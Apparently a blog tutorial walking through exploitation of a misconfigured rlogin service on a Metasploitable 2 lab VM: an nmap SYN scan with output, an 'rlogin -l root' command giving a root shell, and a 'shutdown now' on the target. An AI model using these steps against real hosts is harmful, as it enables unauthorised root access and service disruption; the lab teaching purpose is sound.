As part of an Information and Technology Risk Practitioner's role, a basic grasp of penetration testing and vulnerability exploits is invaluable in order to really understand risks and associated controls particularly when it comes to the importance of vulnerability testing and countermeasures. This is the first of a series of penetration test and vulnerability exploit articles I'm planning to share that will help add some useful practical insight to the Information and Technology Risk Practitioner's toolbox.
Vulnerability
rlogin service running and misconfigured to trust all hosts and users (could have probably stopped at rlogin service is running full stop)
Background
The rlogin misconfiguration exploit is probably one of the easiest exploits available on Metasplotiable 2 Linux and as such is the first exploit we'll learn about. It is also one of the oldest and well known and is rarely seen in the wild today (but use of rlogin in untrusted environment contexts is not unheard of in recent history – rlogin was at the root of the Cisco Prime LAN Management Solution Command Execution Vulnerability in 2012 (CVE-2012-6392) - though not strictly related to this vulnerable configuration that we'll be exploring here, the CVE-2012-6392 example shows that some of these old exploits do resurface many years later).
So what is rlogin? The rlogin (remote Login) protocol definition in RFC 1282 (at https://www.ietf.org/rfc/rfc1282.txt) tells us that:
“The rlogin facility provides a remote-echoed, locally flow-controlled virtual terminal with proper flushing of output [1]. It is widely used between Unix hosts because it provides transport of more of the Unix terminal environment semantics than does the Telnet protocol, and because on many Unix hosts it can be configured not to require user entry of passwords when connections originate from trusted hosts.
The rlogin protocol requires the use of the TCP. The contact port is 513. An eight-bit transparent stream is assumed.”
The rlogin protocol is includes a number of programs two being the rlogin client “rlogin” and the rlogin server “rlogind”.
Reading through the rlogin man pages we learn that when the rlogin client sends a service request to the rlogind server, the rlogind server uses two key pieces of authentication information:
1. Whether the client's source is within the port range 512-1023; and
2. Whether the server hosts $HOME/.rhosts file allows connections from the named client and named users on that client (in the case of root access service requests that we're interested in)
If the client source port is within the range 512-1023 then we're halfway there. The $HOME/.rhosts file consists of a set of trusted network space delimited host/username value pairs that need to be set in order to allow access via rlogin. This configuration file can be set to “+ +” allowing all hosts and all users to connect to the server. In the Metasploitable 2 configuration this has deliberately been set to trust all hosts and all users,
I'm assuming you have setup a pen test environment with a Metasploitable 2 Linux target. If not please see my earlier post at http://grep-blog.blogspot.co.uk/2016/06/setting-up-basic-pen-testing.html. Start your Target (Metasploitable 2 Linux) and Attacker (Kali Linux) hosts now.
How to find and exploit the vulnerability
Finding the Vulnerability
On the Attacker host open the Terminal run the following command:
ifconfig
Check to see what your internal network IP address is configured on
root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.23 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 fe80::a00:27ff:fe8f:4e85 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:8f:4e:85 txqueuelen 1000 (Ethernet)
RX packets 246 bytes 55503 (54.2 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 74 bytes 5694 (5.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.56.151 netmask 255.255.255.0 broadcast 192.168.56.255
inet6 fe80::a00:27ff:fe52:90bc prefixlen 64 scopeid 0x20<link>
ether 08:00:27:52:90:bc txqueuelen 1000 (Ethernet)
RX packets 2064 bytes 131413 (128.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4766 bytes 287328 (280.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1 (Local Loopback)
RX packets 2023 bytes 85347 (83.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2023 bytes 85347 (83.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
then run a TCP SYN scan using nmap to list open ports on hosts within the 192.168.56.0/24 subnet:
nmap -sS 192.168.56.0/24
This will come back with a list of open ports on hosts within your subnet
root@kali:~# nmap -sS 192.168.56.0/24
Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-06 23:50 BST
Nmap scan report for 192.168.56.1
Host is up (0.00040s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
80/tcp open http
88/tcp open kerberos-sec
445/tcp open microsoft-ds
548/tcp open afp
3689/tcp open rendezvous
5900/tcp open vnc
MAC Address: 0A:00:27:00:00:00 (Unknown)
Nmap scan report for 192.168.56.2
Host is up (0.00013s latency).
All 1000 scanned ports on 192.168.56.2 are filtered
MAC Address: 08:00:27:1F:8B:E4 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.150
Host is up (0.00020s latency).
Not shown: 977 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 08:00:27:54:EB:B8 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.151
Host is up (0.0000040s latency).
All 1000 scanned ports on 192.168.56.151 are closed
Nmap done: 256 IP addresses (4 hosts up) scanned in 17.03 seconds
You'll see the rlogin services running on ports 512, 513 and 514 of host 192.168.56.150 (the Metasploitable 2 Linux host).
Exploiting the vulnerability
You'll need the rsh-client first - get this by running the following command:
apt-get install rsh-client
Then simply run the following rlogin command:
rlogin -l root 192.168.56.150
You'll be presented with remote access to the target host's root account:
root@kali:~# rlogin -l root 192.168.56.150
Last login: Mon Jun 6 18:44:41 EDT 2016 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~#
To test your access, shutdown the Target host with shutdown now:
root@metasploitable:~# shutdown now
Broadcast message from root@metasploitable
(/dev/pts/1) at 19:02 ...
The system is going down for maintenance NOW!
root@metasploitable:~# rlogin: connection closed.
root@kali:~#
And there you have it! You've successfully completed your first pen test and exploit.
Note: This is for education purposes only and such activity must only be performed in your own isolated pen test environment. Never employ any of these techniques against hosts outside of your own isolated pen test environment.
No comments:
Post a Comment